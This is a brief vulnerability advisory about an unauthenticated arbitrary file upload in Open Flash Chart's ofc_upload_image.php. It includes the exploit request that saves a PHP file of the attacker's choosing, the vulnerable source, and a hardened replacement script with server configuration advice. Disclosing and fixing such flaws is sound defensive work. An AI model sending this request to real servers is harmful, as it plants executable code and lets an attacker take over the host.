Vulnerable file saves POST data under an arbitrary file extension
Vulnerable file: /chart/php-ofc-library/ofc_upload_image.php

Exploitation:
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php (hfy.php is the file name)
POST arbitrary data
Saved at: http://localhost/chart/tmp-upload-images/hfy.php

The vulnerable file is in the latest version of wss, and even the paid version has it (the demo deployed in the Sina store)~

<?php

//
// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
//

/*

print_r( $_GET );
print_r( $_POST );
print_r( $_FILES );

print_r( $GLOBALS );
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );

*/

// default path for the image to be stored //
$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;

//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//

$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

//
// LOOK:
//
exit();
//
// PHP5:
//

// default path for the image to be stored //
$default_path = 'tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
    echo "FILE UPLOAD FAILED";
}

?>

Fix:
This vulnerable file is simply a tragedy. How to fix it: add permission checks, extension validation and so on~ work it out yourself.
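
One way to apply the permission and extension checks named in the fix, as an added example that is not code from the original post or from the Open Flash Chart project. The session key `$_SESSION['user_id']`, the PNG-only policy and the 2 MiB limit are assumptions made for illustration.

```php
<?php
// Added example: hardened replacement for ofc_upload_image.php.
// Assumptions (not from the original page): the application stores a
// logged-in marker in $_SESSION['user_id'], and charts are saved as PNG only.
declare(strict_types=1);

const UPLOAD_DIR = __DIR__ . '/../tmp-upload-images/';
const MAX_BYTES  = 2 * 1024 * 1024;   // constructed limit: 2 MiB

function reject(int $status, string $msg): void {
    http_response_code($status);
    exit($msg);
}

session_start();
// 1. Permission check: anonymous callers may not write files at all.
if (empty($_SESSION['user_id'])) {
    reject(403, 'Authentication required');
}
if (($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST') {
    reject(405, 'POST only');
}

// 2. Read the raw body with a hard size cap ($HTTP_RAW_POST_DATA was removed in PHP 7).
$data = file_get_contents('php://input', false, null, 0, MAX_BYTES + 1);
if ($data === false || $data === '' || strlen($data) > MAX_BYTES) {
    reject(413, 'Empty or oversized upload');
}

// 3. Content check: the bytes must decode as a PNG, whatever the client claims.
$info = @getimagesizefromstring($data);
if ($info === false || $info[2] !== IMAGETYPE_PNG) {
    reject(415, 'Only PNG images are accepted');
}

// 4. The server picks the name and the extension; $_GET['name'] is never used.
$name = bin2hex(random_bytes(16)) . '.png';
if (!is_dir(UPLOAD_DIR) && !mkdir(UPLOAD_DIR, 0755, true)) {
    reject(500, 'Cannot create upload directory');
}

// 5. 'x' mode fails if the file already exists, so nothing is overwritten.
$fh = fopen(UPLOAD_DIR . $name, 'xb');
if ($fh === false) {
    reject(500, 'Cannot open file');
}
fwrite($fh, $data);
fclose($fh);
echo 'Saved as: ' . $name;
```

Passing the image check does not make the bytes harmless, so the web server should also be configured not to execute scripts from tmp-upload-images/. If the upload endpoint is not used at all, deleting the file removes the exposure entirely.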